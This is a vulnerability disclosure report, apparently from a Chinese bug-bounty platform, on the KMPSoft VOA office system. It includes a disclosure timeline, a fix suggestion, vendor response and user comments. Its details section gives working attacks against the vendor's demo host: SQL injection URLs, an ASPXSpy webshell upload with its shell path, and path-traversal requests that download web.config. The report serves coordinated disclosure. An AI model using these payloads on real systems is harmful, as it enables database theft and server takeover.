漏洞概要
关注数(24)
关注此漏洞
漏洞标题:某OA系统多处SQL注入/任意文件上传GetShell/任意文件下载/信息泄露打包
提交时间:2014-06-28 19:02
修复时间:2014-09-26 19:04
公开时间:2014-09-26 19:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2014-06-28: 细节已通知厂商并且等待厂商处理中
2014-07-03: 厂商已经确认,细节仅向厂商公开
2014-07-06: 细节向第三方安全合作伙伴开放
2014-08-27: 细节向核心白帽子及相关领域专家公开
2014-09-06: 细节向普通白帽子公开
2014-09-16: 细节向实习白帽子公开
2014-09-26: 细节向公众公开
简要描述:
某OA系统多处SQL注入可拖库,任意文件上传GetShell,无需登录任意文件下载漏洞打包
详细说明:
官网:http://www.kmpsoft.com/index.htm
VOA协同办公系统
官方案例:http://www.kmpsoft.com/solution.htm
官方案例还是很多的,而且大量政府,事业单位,教育等多个行业。
官方demo地址:http://demo.kmpsoft.com/
0x001 SQL注入漏洞
第一处SQL注入
http://demo.kmpsoft.com/Archive/input/input.aspx?mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' and db_name()>0 -- -
第二处SQL注入
http://demo.kmpsoft.com/Archive/send/send.aspx?mode=3&oid=a8b011b7-e7b7-43df-a162-6ae5523f1494' and db_name()>0 -- -
第三处SQL注入
http://demo.kmpsoft.com/rules/rules.aspx?mode=3&oid=8eeb9c5b-6daa-410f-a90c-f895ad2e7aae' and db_name()>0 -- -
这里以第一处为例:
http://demo.kmpsoft.com/Archive/input/input.aspx?mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' and db_name()>0 -- -

http://demo.kmpsoft.com/Archive/input/input.aspx?mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' and (select @@version)>0 -- -

数据库信息如下:
当前数据库
Database: a0719175457
[191 tables]
192个表就不依依列出来了,看看myUser表的结构予以证明:
0x002 任意文件上传GetShell
个人办公——个人文件柜——我的文件——新增——附件——上传
这里上传没有做任何限制,直接上传aspx文件
这里我们上传ASPXSpy.apsx文件:

上传后查看页面源代码得到上传后文件的fileanme=2014628164329.aspx:

但是不知道上传后的路径,扫一下路径看看有什么upload/uploadfile/等这些目录

upfiles访问403,应该就这个目录了,试一下,果然成功了!
shell地址:http://demo.kmpsoft.com/upfiles/2014628164329.aspx

0x003 无需登录任意文件下载漏洞
这里的任意文件下载无需登录,直接下载,导致系统源代码,系统配置文件,账户信息大量泄漏
http://demo.kmpsoft.com/_controls/upfile/UpFile_Main_Down.aspx?p_docname=UpFile_Main_Down.aspx&p_filename=../_controls/upfile/UpFile_Main_Down.aspx&p_open_type=_blank&random=0.6767177609908288

http://demo.kmpsoft.com/_controls/upfile/UpFile_Main_Down.aspx?p_docname=web.config&p_filename=../web.config&p_open_type=_blank&random=0.6767177609908288

数据库等敏感信息泄漏

漏洞证明:
修复方案:
严格过滤,严格控制上传,控制权限,控制下载文件路径等
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2014-07-03 11:23
厂商回复:
CNVD确认所述DEMO情况,目前难以找到应用实例情况,已经由CNVD直接联系软件生产厂商,深圳市鹏威信息技术有限公司,电话至0755-8661****(对方称不需要),后将通报发送至网站邮箱market 中处置。
最新状态:
暂无
漏洞评价:
评论
-
2014-06-28 19:05 |
魇 ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)
-
2014-06-28 19:30 |
xfkxfk 
( 核心白帽子 | Rank:2179 漏洞数:338 | 呵呵!)
@魇 从安全漏洞本身来说,一个一个发没多大意义,你说咧
-
2014-06-28 19:31 |
魇 ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)
-
2014-06-28 19:32 |
U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)
-
2014-06-28 20:24 |
′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)
-
2014-06-28 22:05 |
不许联想 ( 路人 | Rank:15 漏洞数:3 | 求收编,本人会注入,会上传,会Xss,会破...)
-
2014-07-03 12:06 |
命运 ( 路人 | Rank:2 漏洞数:1 | 我是来乌云秀智商下限的~~)
-
2014-09-26 22:31 |
kydhzy ( 普通白帽子 | Rank:362 漏洞数:62 | 软件测试)
-
2014-09-26 22:36 |
U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)